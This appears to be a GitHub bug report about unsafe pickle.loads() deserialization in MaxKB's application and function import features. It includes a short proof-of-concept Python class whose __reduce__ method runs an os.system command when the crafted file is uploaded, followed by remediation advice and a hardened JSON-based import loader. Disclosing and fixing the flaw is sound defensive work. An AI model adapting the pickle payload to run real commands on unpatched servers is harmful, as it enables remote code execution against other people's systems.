[Bug] The import function may have deserialization vulnerabilities #2574

@muyulong

Description

Contact Information

No response

MaxKB Version

v1.10.2-lts (build at 2025-03-05T19:39, commit: bc3dcda)

Problem Description

Description:

The "import application" and "import function" features deserialize user-uploaded files directly with Python's pickle.loads(). This is a serious security vulnerability, because pickle deserialization can execute arbitrary code: an attacker can run arbitrary code on the server by crafting a malicious pickle file.

Affected files:

apps/application/serializers/application_serializers.py
apps/function_lib/serializers/function_lib_serializer.py

Steps to Reproduce

Verification

import pickle
import os


class Evil:
    def __reduce__(self):
        return (os.system, ('echo "Whoops,you have been hacked!" > /tmp/hacked.txt',))


evil_data = pickle.dumps(Evil())


with open("evil_data.mk", "wb") as f:
    f.write(evil_data)

# Upload this file through the page or the API; arbitrary commands can then be executed on the server.

The expected correct result

1. Stop using pickle.loads() to process user-uploaded data.
2. Use a different, safe serialization format.
3. Add data validation and file-content validation.

Related log output

Additional Information

No response
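A hardened import path of the kind the report's three recommendations describe, as an added example that is not MaxKB's code and not the reporter's: the uploaded bytes are parsed as JSON (which cannot execute code), checked against an explicit field list, and pickle streams are refused before any parsing happens. The field names (name, code, input_field_list), the .mk file layout and the helper names are assumptions made for illustration; the real MaxKB export format is not shown in the issue.

```python
import json
import pickle  # used here only to build a constructed sample of what the loader must refuse

# Hypothetical schema for an exported function definition. These field names
# are an assumption for the example, not MaxKB's real export format.
ALLOWED_FIELDS = {"name": str, "code": str, "input_field_list": list}


class InvalidImportFile(ValueError):
    """Raised for any upload that is not a well-formed export."""


def load_import_file(raw: bytes) -> dict:
    """Parse an uploaded export as JSON and validate its structure.

    This stands in for pickle.loads(): json.loads never instantiates
    arbitrary classes or calls arbitrary callables, and the explicit field
    check rejects anything that does not match the expected shape.
    """
    # Pickle streams for protocol 2 and above begin with 0x80. Refusing them
    # up front gives a clear error; older protocols simply fail JSON parsing.
    if raw[:1] == b"\x80":
        raise InvalidImportFile("pickle payloads are not accepted")
    try:
        data = json.loads(raw.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError) as exc:
        raise InvalidImportFile(f"not valid JSON: {exc}") from exc
    if not isinstance(data, dict):
        raise InvalidImportFile("top-level value must be an object")
    unknown = set(data) - set(ALLOWED_FIELDS)
    if unknown:
        raise InvalidImportFile(f"unexpected fields: {sorted(unknown)}")
    for field, expected_type in ALLOWED_FIELDS.items():
        if field not in data:
            raise InvalidImportFile(f"missing field: {field}")
        if not isinstance(data[field], expected_type):
            raise InvalidImportFile(f"field {field} must be {expected_type.__name__}")
    return data


def export_function(definition: dict) -> bytes:
    """Serialize a definition with json.dumps instead of pickle.dumps."""
    return json.dumps(definition, ensure_ascii=False).encode("utf-8")


def try_load(raw: bytes):
    """Return ('ok', data) or ('rejected', reason) for an uploaded file."""
    try:
        return ("ok", load_import_file(raw))
    except InvalidImportFile as exc:
        return ("rejected", str(exc))


# Constructed sample inputs for demonstration.
GOOD_FILE = export_function(
    {"name": "add", "code": "def add(a, b):\n    return a + b", "input_field_list": []}
)


class _Harmless:
    # A pickle whose __reduce__ resolves to a benign builtin; it exists only to
    # show that the loader refuses the stream before anything is unpickled.
    def __reduce__(self):
        return (str, ("rejected",))


PICKLE_FILE = pickle.dumps(_Harmless(), protocol=4)

if __name__ == "__main__":
    print(try_load(GOOD_FILE))
    print(try_load(PICKLE_FILE))
    print(try_load(b"[1, 2]"))
```

The magic-byte check is a courtesy for clearer error messages; the actual safety property comes from never calling pickle.loads on untrusted bytes at all, and from the schema check, which keeps unexpected keys out of whatever the import code does next.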
